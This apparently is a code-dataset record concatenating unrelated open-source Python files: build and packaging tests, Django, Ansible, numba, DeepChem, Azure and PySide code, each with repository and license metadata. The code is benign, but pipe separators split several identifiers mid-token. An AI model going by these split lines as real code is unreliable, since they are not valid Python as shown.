<File Id="_libgstpluginsdll" Name="libgstplugins.dll" Source="z:\\\\\\test\\\\lib\\\\gstreamer-0.10\\\\libgstplugins.dll"/>
</Component>
</Directory>
<Component Guid="1" Id="_libfoo.dll">
<File Id="_libfoodll" Name="libfoo.dll" Source="z:\\\\\\test\\\\lib\\\\libfoo.dll"/>
</Component>
</Directory>
</Directory>
</Module>
</Wix>
'''
class MergeModuleTest(unittest.TestCase):
def setUp(self):
self.config = DummyConfig()
cb = create_cookbook(self.config)
store = create_store(self.config)
cb.add_recipe(Recipe1(self.config))
self.package = Package(self.config, store, cb)
self.mergemodule = MergeModule(self.config,
self.package.files_list(), self.package)
def test_add_root(self):
self.mergemodule._add_root()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi" />',
etree.tostring(self.mergemodule.root))
def test_add_module(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0" />'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_package(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_root_dir(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'<Directory Id="TARGETDIR" Name="SourceDir" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_directory(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_directory('lib/gstreamer-0.10')
self.assertEquals(len(self.mergemodule._dirnodes), 3)
self.assertTrue('lib' in self.mergemodule._dirnodes)
self.assertTrue('lib/gstreamer-0.10' in self.mergemodule._dirnodes)
self.mergemodule._add_directory('bin')
self.assertEquals(len(self.mergemodule._dirnodes), 4)
self.assertTrue('bin' in self.mergemodule._dirnodes)
def test_add_file(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_file('bin/gst-inspect-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
self.mergemodule._add_file('bin/gst-launch-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
def test_render_xml(self):
self.config.platform = Platform.WINDOWS
self.mergemodule._get_uuid = lambda : '1'
self.mergemodule.fill()
tmp = StringIO.StringIO()
self.mergemodule.write(tmp)
#self._compstr(tmp.getvalue(), MERGE_MODULE)
self.assertEquals(MERGE_MODULE, tmp.getvalue())
def _compstr(self, str1, str2):
str1 = str1.split('\n')
str2 = str2.split('\n')
for i in range(len(str1)):
if str1[i] != str2[i]:
print str1[i]
print str2[i]
print ""
class InstallerTest(unittest.TestCase):
def setUp(self):
pass
def testAddRoot(self):
pass
def testAddProduct(self):
pass
def testAddPackage(self):
pass
def testAddInstallDir(self):
pass
def testAddUIProps(self):
pass
def testAddMedia(self):
pass
def testAddMergeModules(self):
pass
def testAddMergeModules(self):
pass
def testRender(self):
pass
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py
|
Python
|
apache-2.0
| 1,463
| 0
|
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
|
def __init__
|
(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
|
xroot88/rax_ansible
|
library/rax_security_group.py
|
Python
|
apache-2.0
| 3,554
| 0.002532
|
"""Dummy module to create rax security groups"""
#!/usr/bin/env python
import pyrax
from ansible.module_utils.basic import *
uri_sgs = 'https://dfw.networks.api.rackspacecloud.com/v2.0/security-groups'
def get_sg(cnw, name):
try:
result, sgs = cnw.identity.method_get(uri_sgs)
if result.status_code == 200:
sg_list = filter(lambda sg: sg['name'] == name,
sgs['security_groups'])
return result.status_code, sg_list
except Exception as e:
return e.code, {'status': e.code, 'message': e.message}
def rax_security_group_present(data):
name = data['name']
description = data['description']
cnw = pyrax.cloud_networks
# If already exists, just return the first matching id
result, sg_list = get_sg(cnw, name)
if sg_list:
return False, False, sg_list[0]
data_json = {
'security_group': {
'name': name,
'description' : description
}
}
try:
result, sg = cnw.identity.method_post(uri_sgs, data=data_json)
if result.status_code == 201:
return False, True, result.json()['security_group']
elif result.status_code == 422:
return False, False, result.json()
else:
return True, False, {'status': result.status_code, 'data':
result.json()}
except Exception as e:
return True, False, {'status': 'ERROR', 'data': e.message}
def rax_security_group_absent(data=None):
cnw = pyrax.cloud_networks
name = data['name']
status_code, sg_list = get_sg(cnw, name)
result = None
for sg in sg_list:
sg_id = sg['id']
try:
result, _ = cnw.identity.method_delete(uri_sgs + '/' + sg_id)
if result.status_code == 200:
continue
except pyrax.exceptions.ClientException as e:
if e.code == 409:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id,
'data': 'Security group in use'
}
except Exception as e:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id}
if result:
return False, True, {'status': 'deleted', 'deleted_security_groups':
[sg['id'] for sg in sg_list]}
else:
return False, False, {'status': 'security group not found', 'security_groups':
sg_list}
def main():
fields = {
'name': {'required': True, 'type': 'str'},
'description': {'required': False, 'type': 'str'},
'region': {'required': True, 'type': 'str'},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
'type': 'str'
}
}
choice_map = {
'present': rax_security_group_present,
'absent': rax_security_group_absent
}
module = AnsibleModule(argument_spec=fields)
pyrax.set_setting('identity_type', 'rackspace')
pyr
|
ax.set_credential_file('rax.py')
pyrax.set_setting('region', module.params['region'])
is_error, has_changed, result = \
choice_map.get(module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, security_group=result)
else:
|
module.fail_json(msg='Error', security_group=result)
if __name__ == '__main__':
main()
|
GaZ3ll3/numba
|
numba/cuda/tests/cudadrv/test_inline_ptx.py
|
Python
|
bsd-2-clause
| 1,302
| 0
|
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Module, Type, Builder, InlineAsm
from llvmlite import binding as ll
from numba.cuda.cudadrv import nvvm
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
@skip_on_cudasim('Inline PTX cannot be used in the simulator')
class TestCudaInlineAsm(CUDATestCase):
def test_inline_rsqrt(self):
mod = Module.new(__name__)
fnty = Type.function(Type.void(), [Type.pointer(Type.float())])
fn = mod.add_function(fnty, 'cu_rsqrt')
bldr = Builder.new(fn.append_basic_block('entry'))
rsqrt_approx_fnty = Type.function(Type.float(), [Type.float()])
inlineasm = InlineAsm.get(rsqrt_approx_fnty,
'rsqrt.approx.f32 $0, $1;',
'=f,f', side_effect=True)
val = bldr.load(fn.args[0])
res = bldr.call(inlineasm, [val])
bldr.store(res, fn.args[0])
bldr.ret_void()
# generate ptx
nvvm.fix_data_layout(mod)
nvvm.set_cuda_kernel(fn)
nvvmir = str(mod)
ptx = nvvm.llvm_to_ptx(nvvmir)
self.assertTrue('rsqrt.approx.f32' in str(ptx
|
))
if __
|
name__ == '__main__':
unittest.main()
|
NicovincX2/Python-3.5
|
Divers/draw_a_clock_vpython.py
|
Python
|
gpl-3.0
| 6,444
| 0.001552
|
# -*- coding: utf-8 -*-
import os
"""Clock for VPython - Complex (cx@cx.hu) 2003. - Licence: Python
Usage:
from visual import *
from cxvp_clock import *
clk=Clock3D()
while 1:
rate(1)
clk.update()
See doc strings for more.
Run this module to test clocks.
TODO: More types of clocks, such as 3D digital,
church clock, hour-glass, pendulum clock, stopper, etc...
Modifications:
2003.01.23. - Complex (cx@cx.hu): First release
2003.01.23. - Complex (cx@cx.hu): now gmtime imported correctly
"""
__all__ = ['Clock3D']
from visual import *
from visual.text import text
from time import time, localtime, gmtime
from math import sin, cos, pi
def Clock3D(clock_type='analog', *args, **kw):
"""Create a clock with specified type,
keyword arguments are passed through,
returns a VPython object derived from frame"""
if clock_type == 'analog':
return AnalogClock(*args, **kw)
raise ValueError('Invalid 3D clock type: %r' % (type,))
class Base(object):
"""Base class to pass specific keyword
arguments with convenient defaults"""
def __init__(self, kwlist=[], *args, **kw):
self.kwlist = kwlist
for k, v in kwlist.items():
if kw.has_key(k):
v = kw[k]
del kw[k]
self.__dict__[k] = v
self.args = args
self.kw = kw
class AnalogClock(Base):
"""Analog clock, keyword arguments:
frame=reference frame to use (default: None),
pointers=pointers to display, cobination of characters 'h', 'm' and 's' (default: 'hms')
ring_color=color of ring around the clock (default: color.yellow)
back_color=color of clock's back plate (default: color.white)
big_tick_color=color of big ticks (at 12,3,6,9 hours) (default: color.red)
small_tick_color=color of small ticks (at 1,2,4,5,7,8,10,11 hours) (default: color.blue)
minute_dot_color=color of minute dots between ticks (default: (0.4,0.4,0.4))
number_color=color of hour numbers (default: color.black)
hour_pointer_color=color of hour pointer (default: color.red)
minute_pointer_color=color of hour pointer (default: color.blue)
second_pointer_color=color of hour pointer (default: (0.4,0.4,0.4))
"""
def __init__(self, *args, **kw):
"""Create primitives of clock"""
Base.__init__(self, {
'frame': None,
'pointers': 'hms',
'ring_color': color.yellow,
'back_color': color.white,
'big_tick_color': color.red,
'small_tick_color': color.blue,
'minute_dot_color': (0.4, 0.4, 0.4),
'number_color': color.black,
'hour_pointer_color': color.red,
'minute_pointer_color': color.blue,
'second_pointer_color': (0.4, 0.4, 0.4)}, *args, **kw)
if not self.frame:
self.frame = frame(*self.args, **self.kw)
pl = list(self.pointers)
hp, mp, sp = 'h' in pl, 'm' in pl, 's' in pl
ring(frame=self.frame, axis=(0, 0, 1), radius=1,
thickness=0.05, color=self.ring_color)
cylinder(frame=self.frame, pos=(0, 0, -0.03),
axis=(0, 0, 0.02), radius=1, color=self.back_color)
for i in range(60):
a = pi * i / 30.0
if i % 5 == 0:
j = i / 5
if j % 3:
c, h = self.small_tick_color, 0.06
else:
c, h = self.big_tick_color, 0.12
|
box(frame=self.frame, pos=(0.99, 0, 0), length=0.14, height=h,
width=0.12, color=c).rotate(angle=a, axis=(0, 0, 1), origin=
|
(0, 0, 0))
t = text(pos=(0.8 * sin(a), 0.8 * cos(a) - 0.06, 0), axis=(1, 0, 0), height=0.12,
string=str(j + 12 * (not j)), color=self.number_color, depth=0.02, justify='center')
for o in t.objects:
o.frame.frame = self.frame
else:
sphere(frame=self.frame, pos=(1, 0, 0.05), radius=0.01, color=self.minute_dot_color).rotate(
angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
if hp:
self.hf = hf = frame(frame=self.frame)
cylinder(frame=hf, pos=(0, 0, -0.01), axis=(0, 0, 0.02),
radius=0.08, color=self.hour_pointer_color)
box(frame=hf, pos=(0.25, 0, 0.005), axis=(0.5, 0, 0),
height=0.04, width=0.01, color=self.hour_pointer_color)
else:
self.hf = None
if mp:
self.mf = mf = frame(frame=self.frame)
cylinder(frame=mf, pos=(0, 0, 0.01), axis=(0, 0, 0.02),
radius=0.06, color=self.minute_pointer_color)
box(frame=mf, pos=(0.35, 0, 0.025), axis=(0.7, 0, 0),
height=0.03, width=0.01, color=self.minute_pointer_color)
else:
self.mf = None
if sp:
self.sf = sf = frame(frame=self.frame)
cylinder(frame=sf, pos=(0, 0, 0.03), axis=(0, 0, 0.02),
radius=0.04, color=self.second_pointer_color)
box(frame=sf, pos=(0.4, 0, 0.045), axis=(0.8, 0, 0),
height=0.02, width=0.01, color=self.second_pointer_color)
else:
self.sf = None
self.update()
def update(self, unixtime=None, gmt=0):
"""Update clock to specific unix timestamp
or current local time if not specified or None,
use GMT time if gmt is true"""
if unixtime == None:
unixtime = time()
if gmt:
tm = gmtime(unixtime)
else:
tm = localtime(unixtime)
h, m, s = tm[3:6]
ts = h * 3600 + m * 60 + s
aml = [2.0 / 86400.0, 1.0 / 3600.0, 1.0 / 60.0]
for am, f in zip(aml, [self.hf, self.mf, self.sf]):
if not f:
continue
a = 2 * pi * ts * am
f.axis = ax = rotate((0, 1, 0), angle=-a, axis=(0, 0, 1))
f.up = cross(vector(0, 0, 1), ax)
def TestClocks():
scene.title = 'cx_clock test'
tl = [('analog', 0, 0, -pi / 6)]
clk = []
for t, x, y, r in tl:
frm = frame(pos=(x, y, -0.3), axis=(1, 0, 0),
up=rotate((0, 1, 0), axis=(1, 0, 0), angle=r), visible=0)
clk.append(Clock3D(t, frame=frm))
while 1:
rate(1)
for c in clk:
c.update()
c.frame.visible = 1
if __name__ == '__main__':
TestClocks()
os.system("pause")
|
apruden/mica2
|
mica-python-client/src/main/python/mica/access_harmonization_dataset.py
|
Python
|
gpl-3.0
| 1,215
| 0.004115
|
"""
Apply access on a harmonization dataset.
"""
import sys
import mica.core
import mica.access
def add_arguments(parser):
"""
Add command specific options
"""
mica.access.add_permission_arguments(parser, True)
parser.add_argument('id', help='Harmonization dataset ID')
def do_command(args):
"""
Execute access command
"""
# Build and send requests
try:
mica.access.validate_args(args)
request = mica.core.MicaClient.build(mica.core.MicaClient.LoginInfo.parse(args)).new_request()
if args.verbose:
request.verbose()
# send request
if args.delete:
request.delete()
else:
request.put()
try:
response = request.resource(mica.access.do_ws(args, ['draft','harmonization-dataset', args.id, 'accesses'])).send()
except Exception, e:
print Exception, e
# format response
if response.code != 204:
print response.conten
|
t
except Exception, e:
print e
sys.exit(2)
except pycurl.error, error:
er
|
rno, errstr = error
print >> sys.stderr, 'An error occurred: ', errstr
sys.exit(2)
|
cloudify-cosmo/cloudify-manager
|
tests/integration_tests/resources/dsl/deployment_update/modify_relationship_operation/modification/custom_workflow.py
|
Python
|
apache-2.0
| 304
| 0
|
from cloudify.workflows import ctx, parameters
ctx.logger.info(parameters.node_id)
instance = [n for n in ctx.node_instances
if n.node_id == parameters.node_id][0]
for relationship in instance.relationship
|
s:
relationship.e
|
xecute_source_operation('custom_lifecycle.custom_operation')
|
safwanrahman/kuma
|
kuma/attachments/tests/test_views.py
|
Python
|
mpl-2.0
| 9,771
| 0
|
import datetime
import json
from constance.test import override_config
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from django.utils.http import parse_http_date_safe
from kuma.core.urlresolvers import reverse
from kuma.users.tests import UserTestCase
from kuma.wiki.models import DocumentAttachment
from kuma.wiki.tests import WikiTestCase, document, revision
from ..models import Attachment, AttachmentRevision
from . import make_test_file
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='text/plain')
class AttachmentViewTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentViewTests, self).setUp()
self.client.login(username='admin', password='testpass')
self.revision = revision(save=True)
self.document = self.revision.document
self.files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': self.document.slug},
locale='en-US')
@transaction.atomic
def _post_attachment(self):
file_for_upload = make_test_file(
content='A test file uploaded into kuma.')
post_data = {
'title': 'Test uploaded file',
'description': 'A test file uploaded into kuma.',
'comment': 'Initial upload',
'file': file_for_upload,
}
response = self.client.post(self.files_url,
data=post_data)
return response
def test_legacy_redirect(self):
test_user = self.user_model.objects.get(username='testuser2')
test_file_content = 'Meh meh I am a test file.'
test_files = (
{'file_id': 97, 'filename': 'Canvas_rect.png',
'title': 'Canvas rect'},
{'file_id': 107, 'filename': 'Canvas_smiley.png',
'title': 'Canvas smiley'},
{'file_id': 86, 'filename': 'Canvas_lineTo.png',
'title': 'Canvas lineTo'},
{'file_id': 55, 'filename': 'Canvas_arc.png',
'title': 'Canvas arc'},
)
for test_file in test_files:
attachment = Attachment(
title=test_file['title'],
mindtouch_attachment_id=test_file['file_id'],
)
attachment.save()
now = datetime.datetime.now()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=test_file['title'],
description='',
created=now,
is_approved=True)
revision.creator = test_user
revision.file.save(test_file['filename'],
ContentFile(test_file_content))
revision.make_current()
mindtouch_url = reverse('attachments.mindtouch_file_redirect',
args=(),
kwargs={'file_id': test_file['file_id'],
'filename': test_file['filename']})
response = self.client.get(mindtouch_url)
self.assertRedirects(response, attachment.get_file_url(),
status_code=301,
fetch_redirect_response=False)
def test_get_request(self):
response = self.client.get(self.files_url, follow=True)
self.assertRedirects(response, self.document.get_edit_url())
def test_edit_attachment(self):
response = self._post_attachment()
self.assertRedirects(response, self.document.get_edit_url())
attachment = Attachment.objects.get(title='Test uploaded file')
rev = attachment.current_revision
self.assertEqual(rev.creator.username, 'admin')
self.assertEqual(rev.description, 'A test file uploaded into kuma.')
self.assertEqual(rev.comment, 'Initial upload')
self.assertTrue(rev.is_approved)
def test_attachment_raw_requires_attachment_host(self):
response = self._post_attachment()
attachment = Attachment.objects.get(title='Test uploaded file')
url = attachment.get_file_url()
response = self.client.get(url)
self.assertRedirects(response, url,
fetch_redirect_response=False,
status_code=301)
response = self.client.get(url, HTTP_HOST=settings.ATTACHMENT_HOST)
self.assertTrue(response.streaming)
self.assertEqual(response['x-frame-options'],
'ALLOW-FROM %s' % settings.DOMAIN)
self.assertEqual(response.status_code, 200)
self.assertIn('Last-Modified', response)
self.assertNotIn('1970', response['Last-Modified'])
self.assertIn('GMT', response['Last-Modified'])
self.assertIsNotNone(parse_http_date_safe(response['Last-Modified']))
def test_get_previous(self):
"""
AttachmentRevision.get_previous() should return this revisions's
files's most recent approved revision."""
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision1 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision1.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision1.save()
revision1.make_current()
revision2 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='First edit..',
created=datetime.datetime.now(),
creator=test_user,
is_approved=True)
revision2.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision2.save()
revision2.make_current()
self.assertEqual(revision1, revision2.get_previous())
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='application/x-super-weird')
def test_mime_type_filtering(self):
"""
Don't allow uploads outside of the explicitly-permitted
mime-types.
"""
_file = make_test_file(content='plain and text', suffix='.txt')
post_data = {
'title': 'Test disallowed file type',
'description': 'A file kuma should disallow on type.',
'comment': 'Initial upload',
'file': _file,
}
response = self.client.post(self.files_url, data=post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Files of this type are not permitted.')
_file.close()
def test_intermediate(self):
"""
Test that the intermediate DocumentAttachment gets created
correctly when adding an Attachment with a document_id.
"""
doc = document(locale='en-US',
slug='attachment-test-intermediate',
save=True)
revision(document=doc, is_approved=True, save=True)
file_for_upload = make_test_file
|
(
content='A file for testing intermediate attachment model.')
p
|
ost_data = {
'title': 'Intermediate test file',
'description': 'Intermediate test file',
'comment': 'Initial upload',
'file': file_for_upload,
}
files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': doc.slug},
locale='en-US')
response = self.client.post(files_url, data=post_data)
self.assertEqual(response.status_code, 302)
self.asse
|
Agent007/deepchem
|
examples/tox21/tox21_graphcnn.py
|
Python
|
mit
| 1,211
| 0.003303
|
"""
Script that trains graph-conv models on Tox21 dataset.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import json
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
import deepchem as dc
from deepchem.molnet import load_tox21
from deepchem.models.tensorgraph.models.graph_models import PetroskiSuchModel
model_dir = "/tmp/graph_conv"
# Load Tox21 dataset
tox21_tasks, tox21_datasets, transformers = load_tox21(
featurizer='AdjacencyConv')
train_dataset, valid_dataset, test_dataset = tox21_datasets
print(train_dataset.d
|
ata_dir)
print(valid_dataset.data_dir)
# Fit models
metric = dc.metrics.Metric(
dc.metrics.roc_auc_score, np.mean, mode="classification")
# Batch size of models
batch_size = 128
model = PetroskiSuchModel(
len(tox21_tasks), batch_size=batch_size, mode='classification')
model.fit(train_dataset, nb_epoch=10)
print("Evaluating model")
train_scores = model.evaluat
|
e(train_dataset, [metric], transformers)
valid_scores = model.evaluate(valid_dataset, [metric], transformers)
print("Train scores")
print(train_scores)
print("Validation scores")
print(valid_scores)
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/domain_py3.py
|
Python
|
mit
| 2,154
| 0.000464
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Domain(Model):
"""Active Directory Domain information.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properti
|
es: dict[str, object]
:ivar authentication_type: the type of the authentication into the domain.
:vartype authentication_type: str
:ivar is_default: if this is the default domain in the tenant.
:vartype is_default: bool
:ivar is_verified: if this domain's ownership is verified.
:vartype is_verifie
|
d: bool
:param name: Required. the domain name.
:type name: str
"""
_validation = {
'authentication_type': {'readonly': True},
'is_default': {'readonly': True},
'is_verified': {'readonly': True},
'name': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'authentication_type': {'key': 'authenticationType', 'type': 'str'},
'is_default': {'key': 'isDefault', 'type': 'bool'},
'is_verified': {'key': 'isVerified', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, *, name: str, additional_properties=None, **kwargs) -> None:
super(Domain, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.authentication_type = None
self.is_default = None
self.is_verified = None
self.name = name
|
jimcarreer/hpack
|
test/test_hpack_integration.py
|
Python
|
mit
| 2,084
| 0.001919
|
# -*- coding: utf-8 -*-
"""
This module defines substantial HPACK integration tests. These can take a very
long time to run, so they're outside the main test suite, but they need to be
run before every change to HPACK.
"""
from hpack.hpack import Decoder, Encoder
from binascii import unhexlify
from pytest import skip
class TestHPACKDecoderIntegration(object):
def test_can_decode_a_story(self, story):
d = Decoder()
# We test against draft 9 of the HPACK spec.
if story['draft'] != 9:
skip("We test against draft 9, not draft %d" % story['draft'])
for case in story['cases']:
try:
d.header_table_size = case['header_table_size']
except KeyError:
pass
decoded_headers = d.decode(unhexlify(case['wire']))
# The correct headers are a list of dicts, which is annoying.
correct_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
correct_headers = correct_headers
assert correct_headers == decoded_headers
def test_can_encode_a_story_no_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=False)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
def test_can_encode_a_story_with_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoy
|
ing.
|
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=True)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
|
asutherland/opc-reviewboard
|
setup.py
|
Python
|
mit
| 4,082
| 0.002695
|
#!/usr/bin/env python
#
# Setup script for Review Board.
#
# A big thanks to Django project for some of the fixes used in here for
# MacOS X and data files installation.
import os
import shutil
import sys
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.build_py import build_py
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
from reviewboard import get_package_version, is_release, VERSION
# Make sure we're actually in the directory containing setup.py.
root_dir = os.path.dirname(__file__)
if root_dir != "":
os.chdir(root_dir)
# Tell distutils to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is
# /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an
# Apple-specific fix for this in distutils.command.install_data#306. It
# fixes install_lib but not i
|
nstall_data, which is why we roll our own
# install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is
# set to the fixed directory, so we set the installdir to install_lib.
# The # install_data class uses ('install_data', 'install_dir') instead.
self.set_undefined_options('install', ('install_l
|
ib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
PACKAGE_NAME = 'ReviewBoard'
if is_release():
download_url = 'http://downloads.reviewboard.org/releases/%s/%s.%s/' % \
(PACKAGE_NAME, VERSION[0], VERSION[1])
else:
download_url = 'http://downloads.reviewboard.org/nightlies/'
# Build the reviewboard package.
setup(name=PACKAGE_NAME,
version=get_package_version(),
license="MIT",
description="Review Board, a web-based code review tool",
url="http://www.reviewboard.org/",
download_url=download_url,
author="The Review Board Project",
author_email="reviewboard@googlegroups.com",
maintainer="Christian Hammond",
maintainer_email="chipx86@chipx86.com",
packages=find_packages(),
entry_points = {
'console_scripts': [
'rb-site = reviewboard.cmdline.rbsite:main',
],
'reviewboard.scmtools': [
'bzr = reviewboard.scmtools.bzr:BZRTool',
'clearcase = reviewboard.scmtools.clearcase:ClearCaseTool',
'cvs = reviewboard.scmtools.cvs:CVSTool',
'git = reviewboard.scmtools.git:GitTool',
'hg = reviewboard.scmtools.hg:HgTool',
'perforce = reviewboard.scmtools.perforce:PerforceTool',
'svn = reviewboard.scmtools.svn:SVNTool',
],
},
cmdclass=cmdclasses,
install_requires=[
'Django>=1.1.1',
'django_evolution',
'Djblets>=0.5.5',
'Pygments>=0.10',
'flup',
'pytz'
],
dependency_links = [
"http://downloads.reviewboard.org/mirror/",
download_url,
],
include_package_data=True,
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Software Development",
"Topic :: Software Development :: Quality Assurance",
]
)
|
dragondjf/PFramer
|
qframer/ftablewidget.py
|
Python
|
gpl-3.0
| 7,960
| 0.000126
|
#!/usr/bin/python
# -*- cod
|
ing: utf-8 -*-
from PySide2.QtCore import *
|
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class FDragRowsTableWidget(QTableWidget):
def __init__(self, rows=0, cloumns=2, parent=None):
super(FDragRowsTableWidget, self).__init__(rows, cloumns, parent)
self.parent = parent
self.setEditTriggers(self.NoEditTriggers)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QAbstractItemView.SingleSelection)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setDragDropMode(QAbstractItemView.InternalMove)
headerview = QHeaderView(Qt.Horizontal, self)
self.setHorizontalHeader(headerview)
self.setFocusPolicy(Qt.NoFocus)
self.verticalHeader().setVisible(False)
def dropEvent(self, event):
if event.source() == self and \
(event.dropAction() == Qt.MoveAction or
self.dragDropMode() == QAbstractItemView.InternalMove):
success, row, col, topIndex = self.dropOn(event)
if success:
selRows = self.getSelectedRowsFast()
top = selRows[0]
# print 'top is %d'%top
dropRow = row
if dropRow == -1:
dropRow = self.rowCount()
# print 'dropRow is %d'%dropRow
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
self.insertRow(r)
# print 'inserting row at %d'%r
selRows = self.getSelectedRowsFast()
# print 'selected rows: %s'%selRows
top = selRows[0]
# print 'top is %d'%top
